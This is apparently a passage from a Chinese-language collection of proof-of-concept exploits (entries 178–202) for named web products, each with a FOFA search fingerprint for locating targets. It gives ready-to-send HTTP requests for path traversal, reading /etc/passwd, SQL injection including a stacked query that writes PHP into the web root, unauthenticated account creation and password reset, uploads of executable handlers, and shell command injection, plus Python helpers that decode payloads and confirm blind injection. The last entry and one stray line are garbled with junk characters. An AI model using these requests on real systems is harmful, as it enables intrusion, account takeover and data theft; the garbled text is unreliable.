/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 (H3C campus-network self-service system) flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
%2e%2e is a percent-encoded dot-dot that walks from /imc/primepush/ up to the flexFileUpload handler. The stored file name is taken from the form field name (here 12234.txt, not the filename attribute), and the file is served from /imc/primepush/%2e%2e/flex/.

POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Verify:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 (Jianwen engineering management system) arbitrary file read
No fingerprint is given in the source. The path parameter of DownLoad2.aspx is not normalized; ../log4net.config reads the logging configuration one level above the download directory.

POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
Error-based (MySQL updatexml) via the xu parameter; the XPath error in the response carries the output of user().

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 (Runshen enterprise standardization management system) UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
Time-based (SQL Server WAITFOR DELAY) via the start parameter.

POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 (Runshen enterprise standardization management system) AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
The request carries no session cookie; a successful call creates the account test1234 with password test1234 (remove it after testing).

POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 (Interlib library cluster management system) updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
Oracle error-based injection via the token parameter (ctxsys.drithsx.sn); the result of 111111*111111 appears in the error message. The endpoint is a password-change handler and loginid/newpassword are sent along with the probe, so use a login id that does not exist.

GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus 网关 (Sunfull X2Modbus gateway) AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
The /soap/AddUser endpoint takes a raw SQL INSERT as the request body and runs it against the user table; the PURVIEW column is the account's privilege level.

POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 (Realor Tianyi application virtualization system) SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
Stacked query via appid. URL-decoded, the payload is 3');select unhex('<hex>') into outfile '.\\..\\..\\WebRoot\\plom.xgi'# and the hex literal decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); so a vulnerable host writes a self-deleting PHP probe into WebRoot (the .xgi extension is one the product's web server executes as PHP). INTO OUTFILE only works if the database account has the FILE privilege and secure_file_priv permits the target directory.

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host
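As an added example (mine, not part of the original article or of either vendor's code), the following Python recovers what the encoded payloads in entries 161 and 185 actually write to disk: it percent-decodes the 185 query string, pulls the hex literal and the OUTFILE path out of the stacked query, and base64-decodes the <fileFlow> value from 161. The two input values are copied from this article; the regexes and function names are my own.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qsl

# Values copied from the POCs in this article (constructed test data, not live traffic).
REALOR_TARGET = (
    "/index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%27"
    "3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b"
    "20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5C"
    "WebRoot%5C%5Cplom.xgi%27%23"
)
KEYTOP_FILEFLOW = "andqbmFnc3phc3d1ZGh0bmhwYXc="

UNHEX_RE = re.compile(r"unhex\(\s*'([0-9a-fA-F]+)'\s*\)", re.IGNORECASE)
OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s+'([^']+)'", re.IGNORECASE)


def query_params(target: str) -> dict:
    """Percent-decode the query string of a request target ('+' becomes a space, as the server sees it)."""
    return dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))


def decode_unhex_outfile(sql_fragment: str):
    """Recover (file content, file path) from a `select unhex('..') into outfile '..'` stacked query.
    Returns None when the fragment does not carry that pattern. MySQL string literals use
    backslash escapes, so a doubled backslash in the literal is a single backslash on disk."""
    hexmatch = UNHEX_RE.search(sql_fragment)
    pathmatch = OUTFILE_RE.search(sql_fragment)
    if not (hexmatch and pathmatch):
        return None
    content = bytes.fromhex(hexmatch.group(1))
    path = pathmatch.group(1).replace("\\\\", "\\")
    return content, path


def decode_base64_field(value: str) -> bytes:
    """Decode a base64 SOAP field such as <fileFlow>, tolerating stripped '=' padding."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded)


if __name__ == "__main__":
    params = query_params(REALOR_TARGET)
    content, path = decode_unhex_outfile(params["appid"])
    print("185 writes", repr(content), "to", path)
    print("161 fileFlow decodes to", decode_base64_field(KEYTOP_FILEFLOW))
```

The same two helpers apply to any captured request of these shapes: feed the decoded parameter value to decode_unhex_outfile to learn which web shell a MySQL stacked query dropped and where, and decode_base64_field to see what an upload SOAP call carried.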
" j7 H ^. [3 B3 k& Z( {0 K X$ A
186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic (solar) installations.
FOFA: title=="DataCube3"
Heavy-query (time-based) SQLite injection via req_id: RANDOMBLOB(500000000/2) makes the engine build a 250 MB blob, so a vulnerable host answers noticeably slower. Reduce the blob size for a gentler probe.

POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Mura CMS"
Time-based variant of entry 158 (same endpoint and CVE): the MySQL SLEEP(5) in contenthistid delays the response by about 5 seconds on a vulnerable host.

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 (Jiahui video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
The file parameter accepts an absolute path.

GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (Lanwon clinical viewer) deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
Time-based (SQL Server WAITFOR DELAY) via documentUniqueId. The endpoint is a delete handler, so keep the injected value to a time probe with a non-existent id and never point it at a real study.

GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
The poi value is fetched as a URL rather than joined to a path, which is why a file:// scheme reads local files. The request line is shown as captured (HTTP/2); send it as HTTP/1.1 if your tool does not speak HTTP/2.

POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 (ESAFENET CDG electronic document security management system) NavigationAjax SQL injection
FOFA: body="/CDGServer3/index.jsp"
Time-based (SQL Server WAITFOR DELAY) via the id parameter; the /js/../ prefix normalizes to /CDGServer3/NavigationAjax and is a path-normalization bypass for the access filter.

POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP (Futong Tianxia foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA: title="用户登录_富通天下外贸ERP"
The request body is stored with the extension taken from the name parameter; with name=.ashx the body becomes an ASP.NET handler that writes "test" when requested.

POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 (Hillstone CloudView host security management) setSystemTimeAction command execution
FOFA: body="山石云鉴主机安全管理系统"
Three steps: obtain a CSRF token under a fixed PHPSESSID, post the time-setting action whose param value is evaluated as code (the POC passes a Python os.system call), then fetch the file the command wrote to confirm execution.

Step 1: obtain the token (the response body carries the value used as {{token}} below)
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: execute the command with the same PHPSESSID and the token
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: confirm execution (the response should contain 23333333333456)
GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE collaboration platform) uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
Quick check: if a request to /servlet/uploadAttachmentServlet gets a response rather than a 404, the servlet is exposed. The filename is not sanitized, so ../ traversal writes the JSP into the deployed fe.war; confirm by requesting hello.jsp under the application's context path.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 (Volans internet behaviour management) send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"
The name field of the JSON body is concatenated into a shell command without escaping; the ; separators run uname -a in the POC.

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 (Fengsu unified authentication platform, CAS) password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"
resetPasswordBySuper accepts the request without any session; xgh is the student/staff number of the account whose password is set to newPass.

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 (Entersoft CRM) Quotegask_editAction SQL injection
FOFA: app="浙大恩特客户资源管理系统"
The ;.js path-parameter suffix is part of the published POC (a common trick for slipping past a Java authentication filter that matches on extension); send the path exactly as written. goonumStr is the injectable parameter.

GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
The sid value is placed in a shell command unquoted. URL-decoded, the payload is `ls />/www/aaa.txt` wrapped in backticks, which writes the root directory listing under the web root. A valid sysauth cookie (an authenticated LuCI session) is required.

GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit CMS assetsmanager/upload file upload
FOFA: title="Authenticate Please!"
Three steps: read the CSRF token (Cockpit calls the field csfr) from the login page, authenticate to obtain a session cookie, then upload a PHP file through the assets manager. Step 2 needs working credentials (admin/admin in the POC), so this is a weak-credential plus unrestricted-upload chain. Token and cookie values below are those of the published POC; every instance issues its own.

Step 1: fetch the token
GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response 200, body contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

Step 2: log in with the token from step 1 to obtain the session cookie
POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response 200 with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Step 3: upload with the session cookie
POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The file is then served from /storage/uploads/tttt.php (it removes itself on first execution).

200. SeaCMS (海洋CMS) dmku SQL injection
FOFA: app="海洋CMS"
Time-based (MySQL sleep): the id parameter of the danmaku endpoint is used unquoted, so a vulnerable host answers about 5 seconds late.

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 (Founder all-media news editing system) binary.do SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
TableName is concatenated into the query. URL-decoded, the body reads
TableName=DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH
(stacked queries, MSSQL, about 5 seconds of delay on a vulnerable host).

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

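Entries 189, 191, 200 and 201 are all blind, time-based injections, and the only evidence of success is a delay. The script below is an added example (not code from the original article or from any vendor) of how to turn that into a reliable verdict: it times several baseline requests and several injected ones and reports a host as vulnerable only when the fastest injected response is still slower than the slowest clean one by roughly the requested delay, which keeps a busy target from producing a false positive on a single slow answer. The mock target, the URLs and the 1-second delay are constructed so the demo runs offline; against a real host you pass its base URL and the published 5-second payload (WAITFOR DELAY '0:0:5' for the MSSQL entries, sleep(5) for SeaCMS).

```python
"""Timing verifier for the blind SQL injection entries 189, 191, 200 and 201.

Added example; not code from the original article or any vendor. The mock
target, the URLs and DELAY are constructed for an offline demo.
"""
import re
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

DELAY = 1.0  # seconds the payload is expected to stall the query (demo value; POCs use 5)


def timed_request(url, data=None, headers=None, timeout=30):
    """Seconds until the response is fully read; an HTTP error is still a timed answer."""
    req = urllib.request.Request(url, data=data, headers=headers or {})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass
    return time.monotonic() - start


def is_time_injectable(baseline_url, injected_url, delay=DELAY, rounds=2,
                       baseline_data=None, injected_data=None, headers=None):
    """True when the fastest injected response beats the slowest baseline by ~delay.

    Comparing slowest-clean against fastest-injected means one slow baseline
    (busy target) cannot cause a false positive and one slow injected request
    cannot carry the verdict alone.
    """
    slowest_clean = max(timed_request(baseline_url, baseline_data, headers) for _ in range(rounds))
    fastest_injected = min(timed_request(injected_url, injected_data, headers) for _ in range(rounds))
    return fastest_injected - slowest_clean >= 0.8 * delay  # 20 % margin for network jitter


class _MockTarget(BaseHTTPRequestHandler):
    """Constructed stand-in for a vulnerable app: stalls when a delay payload reaches it."""

    def _answer(self, raw):
        if re.search(r"waitfor\s+delay|sleep\(", urllib.parse.unquote_plus(raw), re.I):
            time.sleep(DELAY)
        body = b"ok"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._answer(self.path)

    def do_POST(self):
        self._answer(self.rfile.read(int(self.headers.get("Content-Length", 0))).decode())

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock():
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _MockTarget)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo():
    """Run the three POC shapes plus a clean endpoint against the mock.

    Returns (entry189_get, entry191_post, entry200_get, clean_endpoint).
    """
    srv = start_mock()
    base = f"http://127.0.0.1:{srv.server_address[1]}"
    try:
        get_189 = is_time_injectable(
            base + "/xds/deleteStudy.php?documentUniqueId=1",
            base + "/xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:1%27--")
        form = {"command": "nav", "id": "1", "name": "", "openId": ""}
        hostile = dict(form, id="1'waitfor delay '0:0:1'--")
        post_191 = is_time_injectable(
            base + "/CDGServer3/js/../NavigationAjax", base + "/CDGServer3/js/../NavigationAjax",
            baseline_data=urllib.parse.urlencode(form).encode(),
            injected_data=urllib.parse.urlencode(hostile).encode())
        get_200 = is_time_injectable(
            base + "/js/player/dmplayer/dmku/?ac=del&id=1&type=list",
            base + "/js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(1)))v)&type=list")
        clean = is_time_injectable(base + "/healthz", base + "/healthz?probe=1")
    finally:
        srv.shutdown()
        srv.server_close()
    return get_189, post_191, get_200, clean


if __name__ == "__main__":
    print(demo())  # (True, True, True, False) against the mock
```

urllib sends the request target exactly as given, so the /js/../ path from entry 191 survives; if you swap in a client that normalizes paths, that check silently degrades.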
6 m! M/ x7 _ L$ r0 y202. 微擎系统 AccountEdit任意文件上传0 W* u/ C0 K. _* `+ S+ `6 f) E
FOFA:body="/Widgets/WidgetCollection/"
3 q& O* l5 [$ [* y8 M( m1 ~获取__VIEWSTATE和__EVENTVALIDATION值
7 E! n$ p" O% |2 SGET /User/AccountEdit.aspx HTTP/1.1
Y# Q$ {4 p; q% yHost: 滑板人之家; @- T" n1 c$ {7 w1 {2 e9 O }: G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
: F( \. q$ c) s' iContent-Length: 0
5 d% i5 Y9 {3 T6 \& Q
9 t" [1 q1 U, N& [' w( ^
( R- _% s# B2 l* ^+ M8 M. e8 s8 v3 q) \替换__VIEWSTATE和__EVENTVALIDATION值. t6 t7 s! ?1 {# Q: z) \2 z: G
POST /User/AccountEdit.aspx HTTP/1.1
, p3 p$ r+ ]$ J* {Accept-Encoding: gzip, deflate, br5 o2 d1 s9 G: x: m# b, e6 }4 U$ g
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687! x0 W+ L) u4 H$ Y. `
& U% {& C! [7 v& W0 ?- ^! u! x2 ^
-----------------------------786435874t38587593865736587346567358735687. i( {, ^5 M* b! @
Content-Disposition: form-data; name="__VIEWSTATE"
( @6 S) C; o2 t- a+ c" c* |9 }3 y+ t; ]! \8 D
__VIEWSTATE
# ^: }- n3 I0 f% A* P1 o j: n-----------------------------786435874t38587593865736587346567358735687
v9 _" D. R# U0 o B' WContent-Disposition: form-data; name="__EVENTVALIDATION"! ]8 }2 j% s- B! E3 m1 l# l
5 n+ _3 s6 m( l% A, A__EVENTVALIDATION- g* D7 R5 Y. [4 D/ U4 n! D6 {
-----------------------------786435874t38587593865736587346567358735687
" z8 B v8 T$ B* ~7 [2 }8 UContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"& W4 I; C& F- k( ]- P% M7 o0 s
Content-Type: text/plain
6 T0 N6 t* ]" [" v7 R; x( [' k. |; |# F5 `9 a1 a- _0 i
Hello World!
5 D- e# @: ~7 k% [: K& }( `9 D7 x-----------------------------786435874t38587593865736587346567358735687% N- G2 c o a" o( |
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"& \9 a( S) Y- F2 b2 T
9 H( I$ a2 |' u6 [! ^* I) ^上传图片
- ]9 n, a% b. G-----------------------------786435874t38587593865736587346567358735687) c; V ^& o9 `" v( A3 W; K
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"1 @ ?* n) Q, V
* Z. D+ a8 h8 U6 T( K
# ~! N( {5 E* m' o$ f
-----------------------------786435874t385875938657365873465673587356874 Q% W6 Z, G% m, G9 a* x
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail", c% K4 G5 |( h5 j' ^1 d
& C" r0 g9 Q+ }7 Y
) W: O* P7 K0 t* g- G. _
-----------------------------786435874t38587593865736587346567358735687--
4 G- n4 x5 ]/ l. }, j. u- K. E6 u
2 m! W1 A8 e; |, q1 X; C/ L& S
/_data/Uploads/1123.txt
